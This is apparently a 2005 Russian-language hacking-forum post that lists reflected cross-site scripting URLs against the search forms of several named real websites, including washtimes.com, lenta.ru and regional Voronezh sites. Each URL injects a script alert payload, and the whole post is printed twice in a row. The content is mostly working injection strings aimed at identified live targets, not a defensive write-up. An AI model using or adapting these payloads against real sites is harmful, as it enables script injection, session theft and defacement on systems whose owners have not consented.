Dmitro
27.09.2005, 20:56
хм... такой крупный сайт, а XSS ... не хорошо ((
www.washtimes.com (http://www.washtimes.com/)
Например:
Справа форма поиска "Quick Search" - вводи чё хошь...
http://www.washtimes.com/archive/index.php?Action=Go&Keywords='%3E%3Cscript%3Ealert()%3C/script%3E
кстати, вот ещё на лента.ру :
http://lenta.ru/Search?Search="><script>alert()</script>&x=7&y=7
и вот:
http://www.voronezh.ru/cgi-bin/yp.pl?sample=%22+%3Cscript%3Ealert%28%27XSS_BY_YA% 27%29%3C%2Fscript%3E+%22&x=25&y=3
и вот:
http://hosting.vrn.ru/cgi-bin/search/ics?host=ppborneo&query=%22+%3Cscript%3Ealert%28%27XSS_BY_YA%27%29%3 C%2Fscript%3E+%22&mf=10&nodate=1&x=30&y=12
и вот:
http://www.084.vrn.ru/cgi-bin/search.pl?N=%22+%3Cscript%3Ealert%28%27XSS_BY_YA%2 7%29%3C%2Fscript%3E+%22&t=P&A=&T=&il=0&x=25&y=8
А вообще XSS в поисковике... - это щас модно)))
www.washtimes.com (http://www.washtimes.com/)
Например:
Справа форма поиска "Quick Search" - вводи чё хошь...
http://www.washtimes.com/archive/index.php?Action=Go&Keywords='%3E%3Cscript%3Ealert()%3C/script%3E
кстати, вот ещё на лента.ру :
http://lenta.ru/Search?Search="><script>alert()</script>&x=7&y=7
и вот:
http://www.voronezh.ru/cgi-bin/yp.pl?sample=%22+%3Cscript%3Ealert%28%27XSS_BY_YA% 27%29%3C%2Fscript%3E+%22&x=25&y=3
и вот:
http://hosting.vrn.ru/cgi-bin/search/ics?host=ppborneo&query=%22+%3Cscript%3Ealert%28%27XSS_BY_YA%27%29%3 C%2Fscript%3E+%22&mf=10&nodate=1&x=30&y=12
и вот:
http://www.084.vrn.ru/cgi-bin/search.pl?N=%22+%3Cscript%3Ealert%28%27XSS_BY_YA%2 7%29%3C%2Fscript%3E+%22&t=P&A=&T=&il=0&x=25&y=8
А вообще XSS в поисковике... - это щас модно)))